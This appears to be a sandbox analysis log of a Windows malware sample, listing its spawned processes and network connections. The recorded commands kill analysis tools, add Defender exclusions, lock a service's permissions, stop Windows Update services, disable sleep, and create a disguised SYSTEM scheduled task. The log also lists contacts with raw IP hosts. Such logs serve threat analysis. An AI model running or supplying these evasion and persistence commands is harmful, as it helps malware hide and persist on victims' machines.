"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6962567570624244112,17768220755920147847,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7884 /prefetch:1

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Users\Admin\AppData\Roaming\1000068000\Kuteiisd.exe

C:\Users\Admin\AppData\Roaming\1000068000\Kuteiisd.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Windows\system32\taskkill.exe

"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe

C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

C:\Users\Admin\AppData\Roaming\NextChannelSink\TypeId.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 254.3.248.8.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
NL 194.169.175.118:80 194.169.175.118 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
